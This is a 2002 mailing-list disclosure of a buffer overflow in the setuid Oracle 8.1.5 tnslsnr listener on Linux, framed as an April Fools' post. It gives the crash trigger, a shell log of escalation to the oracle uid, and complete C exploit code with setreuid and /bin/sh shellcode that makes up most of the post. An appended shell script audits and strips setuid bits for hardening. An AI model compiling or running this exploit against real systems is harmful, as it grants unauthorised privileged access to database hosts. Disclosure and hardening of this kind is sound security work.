From: KF (dotslash@snosoft.com)
Date: Mon Apr 01 2002 - 09:22:43 CST


    This is meant to be an April Fools' joke, but if you still use old Oracle
    it's not too funny, I guess:

    After I ate a few too many hard boiled eggs this weekend I decided to
    install Oracle and play with it a little. Being poor I didn't have 800
    bones to shell out on Oracle 16i so I had to settle with oldschool
    Oracle 8i from this little mom and pop shop on my corner. They just
    happened to have a copy that would run on linux and it was only 50 bucks
    so I bought it! No more than 10 minutes after the install I found
    an issue... I figured that most anything I would have found would
    already be public knowledge or it was patched up somewhere along the way
    to the current product version. Well, from what I can tell this is an
    unknown issue.

    TNSLSNR for Linux: Version 8.1.5.0.0 - Production on 01-APR-02 11:46:53

    [itchie@ghetto itchie]$ ls -al /home/u01/app/oracle/product/8.1.5/bin/tnslsnr
    -rwsr-s--x 1 oracle oracle 4399723 Jun 11 1999 /home/u01/app/oracle/product/8.1.5/bin/tnslsnr

    There were holes reported on the abuse of $ORACLE_HOME....
    http://online.securityfocus.com/archive/1/140704
    which tnslsnr had issues with, but these appeared patched on this install,
    so I didn't bother trying to use env variables as abuse.

    [dotslash@ghetto itchie]$ export ORACLE_HOME=`perl -e 'print "A" x 9000'`
    [dotslash@ghetto itchie]$ /home/u01/app/oracle/product/8.1.5/bin/tnslsnr
    (no result...exit normally)

    The first thing abnormal I tried hit right on the money... simple
    cmdline b0f:
    [dotslash@ghetto itchie]$ /home/u01/app/oracle/product/8.1.5/bin/tnslsnr `perl -e 'print "A" x 9000'`
    Segmentation fault

    Of course I had to give one of my developers a quick ring and try to
    harass him to stop molesting the Easter bunny and take a second to code
    me up an exploit. Much obliged, "The Itch" took about 10 minutes
    (literally) to come up with the following...

    Happy Easter! and April Fools?!

    [itchie@ghetto tmp]$ cc -o tnslsnrx tnslsnrx.c
    [itchie@ghetto tmp]$ id
    uid=507(itchie) gid=507(itchie) groups=507(itchie)
    [itchie@ghetto tmp]$ ./tnslsnrx
    Oracle tnslsrn 8.1.5
    Vulnerability found by KF / http://www.snosoft.com
    Coded by The Itch / http://www.promisc.org

    Using return address: 0xbffffaf4
    Using buffersize : 2132
    sh-2.05$ id
    uid=515(oracle) gid=507(itchie) groups=507(itchie)

    -KF

    /*
     * Yet another exploit for the 'Unbreakable' Oracle database
     * The vulnerability was found by KF / Snosoft (http://www.snosoft.com)
     * Shellcode created by r0z / Promisc
     * Exploit coded up by The Itch / Promisc (http://www.promisc.org)
     *
     * This exploit was developed on the Snosoft vulnerability research machines
     * mail dotslash@snosoft.com if you wish to participate in vuln research.
     *
     * - The Itch
     * - itchie@promisc.org
     *
     * - Technical details concerning the exploit -
     *
     * 1). Buffer overflow occurs after writing more than 2132 bytes into the
     * buffer at the command line (2128 to overwrite ebp, 2132 to
     * overwrite eip).
     * 2). If you write more than 2132 bytes, other frames will be
     * overwritten afterwards and will mess up your flow of arbitrary code
     * execution. (It must be exactly 2132 bytes!)
     * 3). shellcode will try to do a setreuid(515);
     */

    #include <stdio.h>
    #include <stdlib.h>
    #include <string.h>   /* strlen, memcpy */
    #include <unistd.h>   /* execl */

    #define DEFAULT_EGG_SIZE 4096
    #define NOP 0x90

    /* 2132 + 1 for the \0 at the end of the string */
    #define DEFAULT_BUFFER_SIZE 2133

    /* Shellcode made by r0z (r0z@promisc.org) */
    char shellcode[] =
             "\x31\xdb" /* xor %ebx, %ebx */
             "\x31\xc9" /* xor %ecx, %ecx */
             "\xf7\xe3" /* mul %ebx */
             "\xb0\x46" /* mov $0x46, %al */
             "\x66\xbb\x03\x02" /* mov $0x203, %bx  (0x203 = 515, the oracle uid) */
             "\x49" /* dec %ecx */
             "\xcd\x80" /* int $0x80 */
             "\x31\xd2" /* xor %edx, %edx */
             "\x52" /* push %edx */
             "\x68\x6e\x2f\x73\x68" /* push $0x68732f6e */
             "\x68\x2f\x2f\x62\x69" /* push $0x69622f2f */
             "\x89\xe3" /* mov %esp, %ebx */
             "\x52" /* push %edx */
             "\x53" /* push %ebx */
             "\x89\xe1" /* mov %esp, %ecx */
             "\x6a\x0b" /* pushl $0xb */
             "\x58" /* pop %eax */
             "\xcd\x80"; /* int $0x80 */

    int main(int argc, char *argv[])
    {
            char *buff;
            char *egg;
            char *ptr;
            long *addr_ptr;
            long addr;
            int bsize = DEFAULT_BUFFER_SIZE;
            int eggsize = DEFAULT_EGG_SIZE;
            int i;
            int get_sp = (int)&get_sp;

            if(argc > 1) { bsize = atoi(argv[1]); }

            if(!(buff = malloc(bsize)))
            {
                    printf("unable to allocate memory for %d bytes\n", bsize);
                    exit(1);
            }

            if(!(egg = malloc(eggsize)))
            {
                    printf("unable to allocate memory for %d bytes\n", eggsize);
                    exit(1);
            }

            printf("Oracle tnslsrn 8.1.5\n");
            printf("Vulnerability found by KF / http://www.snosoft.com\n");
            printf("Coded by The Itch / http://www.promisc.org\n\n");
            printf("Using return address: 0x%x\n", get_sp);
            printf("Using buffersize : %d\n", bsize - 1);

            ptr = buff;
            addr_ptr = (long *) ptr;
            /* fill the argument with the guessed return address, one long at a
             * time, staying inside the bsize allocation (the last byte is the \0) */
            for(i = 0; i + 4 <= bsize; i+=4) { *(addr_ptr++) = get_sp; }

            ptr = egg;
            for(i = 0; i < eggsize - strlen(shellcode)-1; i++)
            {
                    *(ptr++) = NOP;
            }

            for(i = 0; i < strlen(shellcode); i++)
            {
                    *(ptr++) = shellcode[i];
            }

            egg[eggsize - 1] = '\0';
            memcpy(egg, "EGG=", 4);
            putenv(egg);
            buff[bsize - 1 ]= '\0';
            /* argv[1] is the 2132-byte string; the argument list is NULL-terminated */
            execl("/home/u01/app/oracle/product/8.1.5/bin/tnslsnr",
                  "tnslsnr", buff, (char *)NULL);
            return 0;
    }
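    As an added example (not from KF's post, The Itch's code, or Oracle), a small POSIX shell audit for the property that turned this command-line overflow into a local privilege escalation: a listener binary carrying the setuid/setgid bits (-rwsr-s--x, owned by oracle). It lists such files under an Oracle home and shows removing the bits from one; the sample tree, file names and modes are constructed stand-ins for $ORACLE_HOME/bin.

```shell
#!/bin/sh
# Added example, not part of the original post or of Oracle's software.
# Finds regular files under an Oracle home with the setuid or setgid bit set,
# the property that let the tnslsnr overflow hand out the oracle uid.

# Print "mode owner path" for every setuid/setgid regular file under $1.
list_setuid() {
    find "$1" -type f \( -perm -4000 -o -perm -2000 \) -exec ls -ld {} \; 2>/dev/null |
        awk '{print $1, $3, $NF}' | sort
}

# Count such files; the pass/fail signal for a hardening check.
count_setuid() {
    find "$1" -type f \( -perm -4000 -o -perm -2000 \) 2>/dev/null | wc -l | tr -d ' '
}

# Remove both bits from one file (only for binaries confirmed not to need
# them) and report whether the file is now clean.
strip_setuid() {
    chmod u-s,g-s "$1" && [ "$(count_setuid "$1")" = "0" ]
}

# Constructed stand-in for $ORACLE_HOME/bin: a fake tnslsnr with the post's
# -rwsr-s--x mode (6751) and a fake sqlplus without it. Prints the directory.
make_sample_home() {
    home=$(mktemp -d)
    mkdir -p "$home/bin"
    printf '#!/bin/sh\nexit 0\n' > "$home/bin/tnslsnr"
    printf '#!/bin/sh\nexit 0\n' > "$home/bin/sqlplus"
    chmod 6751 "$home/bin/tnslsnr"
    chmod 0755 "$home/bin/sqlplus"
    echo "$home"
}

# Audit the sample, strip the listener, audit again; the listing goes to
# stderr and stdout carries "count_before count_after".
demo() {
    home=$(make_sample_home)
    before=$(count_setuid "$home")
    list_setuid "$home" >&2
    strip_setuid "$home/bin/tnslsnr"
    after=$(count_setuid "$home")
    rm -rf "$home"
    echo "$before $after"
}

demo
```

Point list_setuid at a real $ORACLE_HOME to get the same -rwsr-s--x line the post's ls -al showed, for every binary in the tree rather than one at a time.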